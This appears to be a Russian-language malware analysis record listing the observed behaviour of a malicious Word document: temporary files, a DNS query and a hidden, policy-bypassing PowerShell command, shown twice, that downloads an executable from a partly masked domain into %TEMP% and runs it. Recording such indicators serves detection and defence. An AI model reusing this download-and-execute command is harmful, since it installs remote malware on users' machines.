Техническая информация
- http://wx###ads.com/jizy/server2jizy.exe как %temp%\\neworder.exe
- '<SYSTEM32>\cmd.exe' /c powershell.exe -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('http://wx###ads.com/jizy/server2jizy.exe','%TEMP%\\NewOrder.exe') & %TEMP%\\NewOrder.exe
- <Текущая директория>\~wrd0000.tmp
- <Текущая директория>\~wrd0001.tmp
- <Текущая директория>\~wrd0000.tmp
- <PATH_SAMPLE>.doc
- DNS ASK wx###ads.com
- '<SYSTEM32>\cmd.exe' /c powershell.exe -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('http://wx###ads.com/jizy/server2jizy.exe','%TEMP%\\NewOrder.exe') & %TEMP%\\NewOrder.exe' (со скрытым окном)